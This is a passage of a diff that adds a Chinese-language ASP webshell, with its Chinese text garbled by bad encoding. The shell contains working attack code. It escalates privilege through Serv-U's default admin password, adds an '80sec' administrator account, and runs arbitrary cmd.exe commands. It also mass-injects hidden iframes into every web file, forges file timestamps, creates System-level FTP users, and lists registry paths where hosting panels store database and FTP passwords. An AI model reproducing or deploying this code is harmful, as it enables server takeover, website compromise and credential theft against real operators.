+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>��*�</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user 80sec 80sec /add & net localgroup administrators 80sec /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·?q��:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+FuncTion su7()
+response.write"<form name='form1' method='post' action=''>"
+response.write"<p align='center'>"
+response.write"------------------Serv-U Information------------------"
+response.write"<br>"
+response.write"user:"
+response.write"<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+response.write"pwd :"
+response.write"<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+response.write"port:"
+response.write"<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+response.write"---------------------Add User!!! ---------------------<BR>"
+response.write"Domain: &nbsp; "
+response.write"<input name='domain' type='text' class='TextBox' id='domain' value='80sec' /><br>"
+response.write"FTP USER:"
+response.write"<input name='fuser' type='text' class='TextBox' id='fuser' value='80sec'><br>"
+response.write"FTP PASS:"
+response.write"<input name='fpass' type='text' class='TextBox' id='fpass' value='123456'><br>"
+response.write"FTP PORT:"
+response.write"<input name='fport' type='text' class='TextBox' id='fport' value='21'><br>"
+response.write"FTP PATH:"
+response.write"<input name='fpath' type='text' class='TextBox' id='fpath' value='c:\\'>"
+response.write"<br>"
+response.write"Privilege"
+response.write"<select para=value name='privilege'>"
+response.write"<option value=2>Read-only Admin</option>"
+response.write"<option value=3>Group Admin</option>"
+response.write"<option value=4>Domain Admin</option>"
+response.write"<option value=5>System Admin</option>"
+response.write"</select>"
+response.write"</p>"
+response.write"<p align='center'>"
+response.write"<input name='radiobutton' type='radio' value='add' checked class='TextBox'>"
+response.write"Add User "
+response.write"<input type='radio' name='radiobutton' value='del' class='TextBox'> "
+response.write"Del User </p>"
+response.write"<p align='center'>"
+response.write"<input name='Submit' type='submit' class='buttom' value='Run' />"
+response.write"</p>"
+response.write"</form>"
+user = request.Form("duser")
+pass = request.Form("dpwd")
+port = request.Form("dport")
+domain = request.Form("domain")
+fuser = request.Form("fuser")
+fpass = request.Form("fpass")
+fport = request.Form("fport")
+fpath = request.Form("fpath")
+privilege=request.Form("privilege")
+select case privilege
+   case 2:
+  privilege="ReadOnly"
+   case 3:
+  privilege="Group"
+   case 4:
+  privilege="Domain"
+   case 5:
+  privilege="System"
+  end select
+	if request.Form("radiobutton") = "add" Then
+
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & "  DynIPName=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
+        "-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=" & privilege  & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf		
+		'--------
+		'On Error Resume Next
+		Set xPost = CreateObject("Microsoft.XMLHTTP")
+		xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
+		xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
+		Set xPost =nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &"</div>"
+	elseif request.Form("radiobutton") = "del" Then
+	
+		loginuser = "User " & user & vbCrLf
+		loginpass = "Pass " & pass & vbCrLf
+		mt = "SITE MAINTENANCE" & vbCrLf
+		deluser =  "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
+		quit = "QUIT" & vbCrLf	
+		Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+		xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
+		xPost3.Send loginuser & loginpass & mt & deluser & quit 
+		Set xPOST3=nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &" have deleted</div>"
+	else
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
+	end if
+end function
+Function fuzhutq1()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"360ɱ��db�ļ��滻:<br>"
+RRS"c:\Program Files\360\360SD\deepscan\Section\mutex.db <br> "
+RRS"c:\Program Files\360\360Safe\deepscan\Section\mutex.db <br>"
+RRS"C:\Program Files\360\360Safe\AntiSection\mutex.db <br>"
+RRS"Flash�ļ��滻:<br>"
+RRS"C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx <br>"
+RRS"IISrewrite3 �ļ��滻��<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\error.log <br>"
+RRS"DU Meter����ͳ����Ϣ��־�ļ��滻��<br> "
+RRS"c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv <br>"
+RRS"ŵ��ɱ���ļ��滻:<br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.bak <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Validate.dat  <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.Dat  <br>"
+RRS"�����ļ��滻:<br>"
+RRS"C:\WINDOWS\hchiblis.ibl <br>"
+RRS"һ���������Ŀ¼���ļ��� <br>"
+RRS"C:\7i24.com\iissafe\log\startandiischeck.txt  <br>"
+RRS"C:\7i24.com\iissafe\log\scanlog.htm   <br>"
+RRS"�������:<br>"
+RRS"Zend: C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll  <br>"
+RRS"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\  <br>"
+RRS"Ps:������Ȩ����ͨ���ڸ���������ϵͳ<br>"
+end function
+Function fuzhutq2()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"1`c:\windows\temp����hzhost�������µ�ftp��½��¼v���û���������<br>"
+RRS"2@��mssql sa����,mysql root���뼰serv-u��administrator����<br>"
+RRS"mysql root���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass <br>"
+RRS"sqlserver sa���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass<br>"
+RRS"Serv-u�������룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\svrpass<br>"
+RRS"������Ϣ���hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��ʹ��<br>"
+RRS"���ص�ַ���ٶ����� 'hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��' <br>"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq3()
+RRS"<p><center>:N����������������Ȩ:</p><center>"
+RRS"Ĭ�����ݿ����أ�<br>"
+RRS"1.9�棺host_date/%23host%20%23%20date%23.mdb<br>"
+RRS"1.96�棺host_date/%23host%20%23%20date%23196.mdb <br>"
+RRS"���巽����ͨ��������ͬ������IIS,Ȼ���վ��N�����վ��Ŀ¼�£�����ͨ��������ַ���ػصõ���sa��mysql��վ���������Ϣ��key��ͨ������Ĵ�����ܣ�<br>"
+'RRS"��ַ:����Ĵ�"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq4()
+RRS"<font color=#00FF00>��ȴ��������2ED</font>"
+end function
+Function fuzhutq5()
+if Request("Paths") ="" then
+Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"
+if Session("paths")<>"" then  Paths_str=Session("paths")
+	Response.Write "<form id='form1' name='form1' method='post' action=''>"
+	Response.Write "�˳�����Լ�����������Ŀ¼��д���,Ϊ��������ṩһЩ��ȫ�����Ϣ!<br>�����������Ŀ¼,������Զ������Ŀ¼<br>"	
+	Response.Write "<textarea name='Paths' cols='80' rows='10' class='Edit'>"&Paths_str&"</textarea>"
+	Response.Write "<br />"
+	Response.Write "<input type='submit' name='button' value='��ʼ���' / class='but1'>"
+	Response.Write "<label for='CheckNextDir'>"
+	Response.Write "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />����Ŀ¼  "
+	Response.Write "</label>"
+	Response.Write "<label for='CheckFile'>"
+	Response.Write "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  />�����ļ�"
+	Response.Write "</label>"
+	Response.Write "<label for='ShowNoWrite'>"
+	Response.Write "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
+	Response.Write "�Խ�дĿ¼���ļ�</label>"
+	Response.Write "<label for='NoCheckTemp'>"
+	Response.Write "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
+	Response.Write "�������ʱĿ¼</label>"	
+	Response.Write "</form>"
+else
+Response.Write  "<a href=""?"">��������·��</a><br>"
+CheckFile = (Request("CheckFile")="on")
+CheckNextDir = (Request("CheckNextDir")="on")
+ShowNoWriteDir = (Request("ShowNoWrite")="on")
+NoCheckTemp = (Request("NoCheckTemp")="on")
+Response.Write "��������Ҫһ����ʱ�����Ե�......<br>"
+response.Flush
+
+Session("paths") = Request("Paths")
+
+PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
+For i=LBound(PathsSplit) To UBound(PathsSplit) 
+if instr(PathsSplit(i),":")>0 then
+	ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
+End If 
+Next
+Response.Write "[ɨ�����]<br>"
+end if
+end function
+Function cmd2()
+response.write"<form method='post'>"
+response.write"<input type=text name='cmd' size=60>"
+response.write"<input type=submit value='run'></form> "
+response.write"<textarea readonly cols=80 rows=20> "
+response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall
+response.write"</textarea>"
+end function
+Function suftp()
+RRS"<p><center>���ɰ汾��Ϣ:</p>"
+RRS"<form name='form1' method='post' action=''>"
+RRS"<center>����Ա:<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+RRS"<center>����Ա���� :<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+RRS"<center>SERV-U�˿�:<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+RRS"<center>���ӵ��û���:<input name='tuser' type='text' class='TextBox' id='tuser' value='1'><br>"
+RRS"<center>���ӵ��û�����:<input name='tpass' type='text' class='TextBox' id='pass' value='1'><br>"
+RRS"<center>�ʺŵ����Ե�·��:<input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'><br>"
+RRS"<center>����˿�:<input name='tport' type='text' class='TextBox' id='tport' value='21'><br>"
+RRS"<center><input name='radiobutton' type='radio' value='add' checked class='TextBox'>ȷ������"
+RRS"<center><input type='radio' name='radiobutton' value='del' class='TextBox'>ȷ��ɾ��"
+RRS"<p><input name='Submit' type='submit' class='buttom' value='�ύ'></p></form>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+'leaves = leaves & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+'leaves = leaves & "quit" & vbcrlf
+'--------
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+RRS ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+RRS "<font color=#ffffff>OKOKOK</font><br><BR>"
+end if
+End Function
+Case "ScanDriveForm" 
+ ScanDriveForm
+ Case "ScanDrive"     
+  ScanDrive Request("Drive")
+  Case "ScFolder"      
+   ScFolder Request("Folder")
+case "apjdel":apjdel():case "Servu7x":su7():case "fuzhutq1":fuzhutq1():case "fuzhutq2":fuzhutq2():case "fuzhutq3":fuzhutq3():case "fuzhutq4":fuzhutq4():case "fuzhutq5":fuzhutq5():case "Cmd2":cmd2():case "suftp":suftp():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute 